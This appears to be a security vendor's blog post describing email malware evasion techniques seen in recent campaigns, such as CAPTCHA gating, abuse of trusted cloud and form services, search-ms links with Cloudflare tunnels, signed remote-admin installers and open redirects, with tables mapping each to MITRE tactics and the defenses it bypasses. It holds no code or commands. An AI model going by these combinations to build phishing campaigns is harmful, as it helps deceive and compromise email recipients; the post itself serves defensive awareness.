Email remains a cornerstone of modern communication, yet it continues to be a primary vector for cyber threats. Cybercriminals have consistently refined their tactics, particularly in evading detection systems. The rise of sophisticated evasion techniques has made detecting and neutralizing email-based malware increasingly challenging. Understanding these evolving threats is crucial for organizations to adapt their security strategies effectively.
This blog explores emerging trends in email-based malware evasion, focusing on the latest strategies used by cybercriminals. By examining case studies, understanding common evasion techniques, and discussing the future of malware evasion, we aim to equip readers with the knowledge necessary to protect themselves and their organizations from these stealthy threats.
At Inception Cyber, our continuous monitoring of the email threat landscape reveals a shift towards more complex evasion techniques. Our research shows that email payloads are predominantly URL or attachment-based, with attackers heavily relying on HTML, PDF, and archive file formats. These formats are favored due to their ability to evade security filters, their familiarity and trust among users, and their potential for embedding malicious content. Additionally, they offer cross-platform compatibility and provide rich opportunities for social engineering, making them ideal for cybercriminals.
Figure 1: Top payloads in malspam emails
Our analysis has uncovered compelling case studies demonstrating how attackers are not only using evasion techniques within email communications but also across the entire attack kill chain. These real-world examples underscore the rapid evolution of attacker strategies, particularly their sophisticated use of legitimate services to bypass traditional detection technologies at every stage of an attack.
In a recent malspam campaign, we observed attackers leveraging Cloudflare reCAPTCHA services to evade automated analysis and security filters. This tactic increases the chances of their malicious pages going undetected by blocking automated tools and adding an air of legitimacy. The reCAPTCHA mechanism delays analysis, filters out non-human traffic, and ensures that only real users—especially targeted victims—proceed to the next stage of the attack. This underscores the need for advanced security measures and heightened user awareness to combat sophisticated threats.
Figure 2.0: Kill chain for malspam using legitimate services
Employing a combination of evasion tactics ensures that the email bypasses corporate security filters effectively. Notable evasion techniques as shown in figure 2.0 email kill-chain included:
|
Evasion Technique |
MITRE ATT&CK Tactic |
Stage of Kill Chain |
Technology Bypassed |
Why Technology Will Be Bypassed |
|
OneDrive-themed PDF with URL to Legit Office Forms |
Phishing (T1566) |
Delivery |
Email security filters, URL reputation services, Antivirus |
The PDF and URL are associated with trusted services (OneDrive, Office Forms), making it difficult for security filters to identify the threat. |
|
Leveraging Office Forms to Host Malicious URL |
Phishing (T1566) |
Delivery, Exploitation |
Web security gateways, Anti-phishing technology |
Office Forms is a legitimate service, so URLs hosted here are often not flagged by security tools, allowing the malicious URL to bypass detection. |
|
Using Cloudflare reCAPTCHA before Downloading Payload |
Defense Evasion (T1562) |
Exploitation |
Web filtering, Automated analysis technologies such as sandbox |
Cloudflare reCAPTCHA adds a layer of legitimacy and prevents automated tools from accessing the malicious payload, hindering detection and analysis. |
In another case, an email contained a redirector URL leading to a Freshdesk support page, which mimicked a OneDrive file and used Cloudflare CAPTCHA before downloading the malicious payload. This multi-layered evasion demonstrates the evolving sophistication of attacker tactics.
Figure 2.1. Showing URL in malspam body redirecting to legit webpage
In recent months, we've identified a surge in emails employing advanced tactics, techniques, and procedures (TTPs) to bypass detection and enhance effectiveness. These emails, often themed around financial transactions, used HTML payloads as the initial infection vector. This particular campaign stood out due to its use of advanced evasion tactics, such as the search-ms URI protocol handler and Cloudflare tunnels.
|
Evasion Technique |
MITRE ATT&CK Tactic |
Stage of Kill Chain |
Technology Bypassed |
Why Technology Will Be Bypassed |
|
HTML Smuggled search-ms URL Protocol Handler Link |
Execution (T1204) |
Delivery, Exploitation |
Web content filters, Endpoint security technologies |
The search-ms protocol is legitimate, making it difficult for filters to block without affecting legitimate usage; endpoint security may not recognize it as malicious. |
|
Malware Delivery via Cloudflare Tunnel Abuse |
Command and Control (T1071) |
Delivery, Exploitation |
Network security technologies, Traffic inspection |
Cloudflare tunnels encrypt traffic and obfuscate command and control communication, bypassing traditional network security and inspection tools. |
|
Payload Staging via WebDAV and SMB |
Execution (T1204), Lateral Movement (T1021) |
Exploitation, Installation |
Endpoint detection, Network monitoring technologies |
WebDAV and SMB protocols are often used legitimately, allowing attackers to stage payloads without triggering alarms. |
|
Code-Obfuscation of Helper Scripts |
Defense Evasion (T1027) |
Exploitation, Installation |
Antivirus, Script analysis technologies |
Obfuscation techniques make the malicious code difficult to detect or analyze, evading antivirus and traditional script analysis technologies. |
Figure 3. Showing malspam abusing "search-ms" URI Protocol Handler with Cloudflare Tunnels
The use of the search-ms protocol handler allows Windows users to perform search operations via a URI. In this case, attackers use this feature along with TryCloudflare tunnels as part of a malware campaign. TryCloudflare tunnels enable cybercriminals to create temporary infrastructure. Each TryCloudflare tunnel generates a random subdomain on trycloudflare[.]com, with traffic to these subdomains being proxied through Cloudflare to the attackers' local server.
This case study highlights the evolving and sophisticated nature of modern email-based attacks, emphasizing the importance of staying vigilant and adapting security measures to counter these advanced evasion techniques.
A recent malware campaign targeting Israeli companies utilized a well-known technique where attackers exploited recent news events (CrowdStrike outage and the Israel-Hamas war) to craft their emails. This strategy, which capitalizes on heightened interest and urgency, increases the likelihood of recipients engaging with malicious content.
Figure 4: Email exploiting legitimate cloud hosting with a signed payload
The email contained a link to a .zip file with an installer (.msi) that included a pre-configured Atera remote admin agent capable of taking control of Windows devices. This combination of tactics made the malware particularly effective and difficult to detect.
In this particular campaign, attackers employed multiple evasion tactics:
|
Evasion Technique |
MITRE ATT&CK Tactic |
Stage of Kill Chain |
Technology Bypassed |
Why Technology Will Be Bypassed |
|
Use of Recent Event-Themed Email |
Phishing (T1566) |
Delivery |
Email filtering services, User awareness programs |
Attackers exploit the timeliness and relevance of events to create urgency, which can lead to users bypassing normal caution and security checks. |
|
Malicious Payload Signed by Atera |
Defense Evasion (T1218) |
Execution |
Endpoint protection, Digital signature verification |
The payload is signed, causing endpoint protection and signature verification systems to treat it as legitimate. |
|
Payload Hosted on Legitimate Cloud Storage (Onehub) |
Command and Control (T1071) |
Delivery, Exploitation |
URL filtering, Network security technologies |
Hosting the payload on a reputable cloud service bypasses URL filtering and security tools that trust domains like Onehub, allowing the download and execution of malicious content. |
We observed a significant rise in phishing campaigns that exploit open redirect vulnerabilities. Malware attackers exploit open redirect vulnerabilities to deceive users and security systems by manipulating URLs to appear legitimate while redirecting victims to malicious sites. This tactic allows attackers to bypass security filters that might not scrutinize the destination of a trusted URL, trick users into believing they are visiting a safe website, and increase the chances of successful phishing or malware delivery. By leveraging open redirects, attackers can effectively disguise their malicious intent and enhance the effectiveness of their campaigns.
Figure 5.0: Email exploiting open redirect feature of legitimate websites
The email in question redirects victim to a legitimate NaukriGulf job site in the Gulf. However, the URL comes from a phishing email with a redirect link. When users click the link, they briefly land on this legitimate page before being redirected to a phishing site.
For this case, attackers use tactics like:
|
Evasion Technique |
MITRE ATT&CK Tactic |
Stage of Kill Chain |
Technology Bypassed |
Why Technology Will Be Bypassed |
|
Spoofing Sender Domain with a Call-to-Action in Email Body |
Phishing (T1566) |
Delivery |
Email filtering services, Sender authentication checks (SPF/DKIM/DMARC) |
The spoofed domain can closely mimic a legitimate one, and the call-to-action often appears urgent, leading users to act without scrutiny. Existing authentication checks might not detect the subtle differences or may be bypassed entirely if the spoofed domain is convincing. |
|
Abusing Redirect Feature of a Legitimate Webpage |
Phishing (T1566) |
Exploitation |
Web filters, URL reputation services |
Attackers exploit the legitimate website's redirect feature, making the malicious link appear trustworthy. Web filters and URL reputation services may not block the redirect since the initial domain is reputable. |
In one similar case, a malspam campaign was seen tricking the recipient with a claim that they have voicemail. Here as well multiple evasion techniques were seen in the email to avoid traditional security detections.
Figure 5.1. Malspam spoofing email headers and with redirect URL
By employing an open redirect, attackers mask the malicious link behind a trusted domain, allowing them to evade security measures that assess a domain’s reputation and age to filter out threats.
HTML/SHTML smuggling campaigns have emerged as a significant attack vector, with an increase in credential phishing attacks through fake documents featuring login pages. A notable trend is the use of submission form services like NoCodeForm, Submit-Form, and Formbold to create deceptive phishing pages and streamline the collection of stolen credentials.
Figure 6: Credential phishing email campaign kill chain
In this case, attackers employ the following evasion tactics:
|
Evasion Technique |
MITRE ATT&CK Tactic |
Stage of Kill Chain |
Technology Bypassed |
Why Technology Will Be Bypassed |
|
Use of Reputable Submission Form Services |
Phishing (T1566) |
Delivery |
Email filtering services, Domain reputation checks |
Attackers leverage legitimate services, making detection difficult as the domain is trusted and not flagged by reputation checks. |
|
HTML/SHTML Smuggling Payload |
Command and Control (T1071) |
Exploitation |
Network security tools, Content inspection |
Attackers leverage legitimate services, making detection difficult as the domain is trusted and not flagged by reputation checks. |
|
Credential Phishing via Fake Documents |
Credential Access (T1078) |
Delivery, Exploitation |
Email security gateways, User training programs |
Fake documents appear authentic, bypassing security filters; users are deceived by well-crafted phishing sites that mimic legitimate services. |
In today’s rapidly evolving threat landscape, attackers are using increasingly sophisticated, multi-layered evasion techniques that challenge even the most advanced detection systems. As Generative AI continues to evolve, the complexity and volume of these attacks will only grow, making them harder to identify. Traditional security measures—such as signature-based systems, sandboxes, and spam filters—are often inadequate against these evolving tactics.
To counter these threats effectively, adopting next-generation threat prevention strategies is crucial. AI-powered solutions provide a proactive defense that adapts to new attack vectors in real-time. Leveraging AI and large language models (LLMs) enhances defenses by enabling dynamic analysis of emerging threats, identifying patterns and anomalies that traditional methods might miss, and continuously learning from new data to refine detection and response strategies. This integration of advanced AI technologies ensures a more resilient and adaptive cybersecurity posture.
The current landscape of email threats is characterized by increasingly sophisticated, multi-stage attacks, with each phase involving distinct evasion techniques designed to bypass traditional security measures. As highlighted in this blog, the necessity for advanced threat prevention is more critical than ever. InceptionCyber.ai’s Neural Analysis and Correlation Engine (NACE) is uniquely equipped to tackle these challenges by going beyond traditional detection methods, ensuring robust protection against the evolving threat landscape.